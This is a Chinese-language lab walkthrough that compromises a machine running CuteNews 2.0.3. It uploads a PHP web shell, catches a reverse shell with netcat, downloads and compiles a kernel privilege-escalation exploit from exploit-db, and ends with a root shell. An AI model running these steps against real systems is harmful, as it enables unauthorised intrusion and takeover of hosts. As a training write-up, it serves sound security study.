- 連上,http://10.0.2.154/ 發現使用有漏洞的CuteNews v.2.0.3新聞發佈系統
root@kali:~# searchsploit cutenews 2.0.3
--------------------------------------------------------------------------------------------
Exploit Title | Path (/usr/share/exploitdb/platforms)
--------------------------------------------------------------------------------------------
CuteNews 2.0.3 - Arbitrary File Upload | ./php/webapps/37474.txt
- 上傳
shell.php
- 目錄暴破找出upload目錄:
dirb http://10.0.2.154,得到http://10.0.2.154/uploads/
- 開啟metasploit執行:
nc -vnlp 1234
- 執行上傳的shell,
curl http://10.0.2.154/uploads/avatar_testusername_shell.php
- 連上後,spawn a tty:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
www-data@simple:/var/www/html/uploads$
- Ubuntu作業系統版本有權限提升已知漏洞
www-data@simple:/var/www/html/uploads$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.2 LTS
Release: 14.04
Codename: trusty
- 下載exploit:
www-data@simple:/tmp$ wget https://www.exploit-db.com/download/37292
- compile並執行,最後取得root shell:
# gcc 37292.c -o exploit
./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)